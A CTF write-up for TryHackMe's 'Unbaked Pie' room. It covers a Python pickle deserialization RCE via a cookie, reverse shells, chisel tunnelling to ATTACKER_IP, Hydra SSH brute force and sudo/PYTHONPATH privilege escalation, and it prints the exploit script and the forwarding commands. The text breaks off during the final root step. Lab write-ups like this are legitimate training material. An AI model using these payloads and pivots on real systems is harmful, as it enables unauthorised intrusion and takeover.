Unbaked Pie – TryHackMe CTF writeup

by

Description

Don’t over-baked your pie!

https://tryhackme.com/room/unbakedpie

Port scanning

Nmap port scanning reveals that we have only one port open: 5003

Main website

On the main website, we can see some cooking recipes. Photo of pickles is a tip 🙂

Cookie

When we are using the search form, we can see that the phrase we are searching is encoded using base64 and set as a cookie value

Deserialization of pickle → RCE

The header reveals that we are dealing with a Python application.
When we are trying to access /admin we can see some information about the server that is leaked due to debug mode enabled

Pickle is a Python module used for serializing (pickling) and deserializing (unpickling) Python object structures into a byte stream. But if the application is deserializing user-controlled input, the attacker can craft a malicious payload that will be executed during deserialization (Remote Code Execution). 

To check if it’s possible to gain RCE through deserialization, I prepared a Python script to pickle (serialize) the command and encode it with base64:

import pickle
import base64
import os

class RCE 
    def __reduce__(self):
    cmd = ('ping -c 3 ATTACKER_IP')
    return os.system, (cmd,)
    
if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))

I used tcpdump to check for incoming ping traffic on tun0.
I set the Base64 value generated by the Python script as the search_cookie value and refreshed the page.
Below, we can see that we can execute a command on the server.

Now that we know ping is working, we can craft a reverse shell command and put it into the search_cookie value.
I prepared a payload using the same script, but with a reverse shell command, and started a listener on port 1235, I changed the cookie value, and after a while, I got a reverse shell.

Enumerating the host

The host ID shows that we are running as root, but inside a container. I used linpeas.sh to enumerate the host. Below, we can see that there are other hosts on the same network (we are at 172.17.0.2).

We can see in the bash history that someone tried to connect via ssh as user ramsey, but also that the package openssh was removed.

Port forwarding – chisel

As I can’t use ssh on my target machine, I used chisel tool to forward ports.

First I started chisel server on my machine:

chisel server -p 9000 --reverse

Next, I executed a command on the target machine to forward port 172.17.0.1:22 to ATTACKER_IP:9000

# commands to run on target machine after chisel is downloaded
chmod +x chisel_1.10.1_linux_amd64
./chisel_1.10.1_linux_amd64 client ATTACKER_IP:9000 R:127.0.0.1:9001:172.17.0.1:22

Brute force ssh using Hydra

As I don’t know ramsey’s password I used rockyou.txt wordlist and hydra to brute force the password:

ramsey → oliver

I checked what commands ramsey can run using sudo

as ramsey can run vuln.py script as oliver I replaced script vuln.py with my own vuln.py script:

mv vuln.py vuln.py.backup
vim vuln.py
# I started lister on my kali linux:
nc -nlvp 4446

# and on target machine I executed script:
sudo -u oliver /usr/bin/python /home/ramsey/vuln.py

After a while, I had a reverse shell connected as oliver

oliver → root

I checked what commands oliver can run, and it looks like he can change environmental variables and run dockerScript.py 

I noticed that dockerScript.py is importing docker library:

In /dev/shm I created docker.py with a reverse shell – it’s going to mimic a docker library after we set PYTHONPATH variable to /dev/shm

I started a listener on my kali, on port 4447 (nc -nlvp 4447) and executed command on target machine: